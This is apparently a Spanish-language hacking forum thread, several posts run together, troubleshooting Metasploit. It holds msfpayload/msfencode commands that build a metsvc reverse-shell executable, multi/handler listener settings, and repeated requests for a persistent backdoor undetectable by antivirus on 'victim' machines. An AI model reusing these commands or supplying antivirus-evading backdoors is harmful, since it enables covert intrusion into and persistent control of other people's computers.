Ip privada si, si te instalas una maquina virtual.
ip publica no

Hola de nuevo.
Por mas que lo intento, no consigo establecer una conexion atraves del payload metsvc_reverse_tcp.

Primero me creo un ejecutable con:
./msfpayload windows/metsvc_reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444  R | msfencode -c 2 -t exe -o /root/my.exe

Segundo pongo el metasploit a la escucha con:
use exploit/multi/handler
set PAYLOAD windows/metsvc_reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT
exploit

luego envio el my.exe a un XP, lo ejecuto y el metasploit ni se inmuta.
A que puede ser devido?
Tengo el metasploit actualizado a la ultima revision

Me refiero a un backdoor persistente que me de una consola cuando quiera.
Solo conozco el nc pero el antivirus lo detecta. También se puede instalar un backdoor desde el meterpreter pero también lo detecta el antivirus.
Alguna idea?

Una vez conseguida una consola en un pc víctima, que backdoor seria mejor usar para que sea indetectable por los antivirus??

Lo volveré a repasar. Gracias

Si, y no funciona!

Según he visto en algún tuto tras instalar el metsvc, dejas corriendo en la víctima 2 servicios: metsvc.exe y metsvc-server.exe
por lo que veo en mi laboratorio, tras instalar metsvc solo deja corriendo 1 servicio: metsvc.exe.
a que puede ser debido?
 Tengo el metasploit al día y el xp víctima no tiene ni AV ni firewall

use multi/handler
set payload ...
set lport 200
set rhost 192.168.1.35
exploit

Después de conseguir un meterpreter, instalo sin problemas el metsvc en el xp victima.
Luego ejecuto en el metasploit el handler con el payload metsvc_bind_tcp y no consigo conectarme al metsvc.
El metsvc esta corriendo en la víctima porque veo el numero de proceso cuando ejecuto
el comando ps

Buenísima la modificación para que funcione en un spanish!!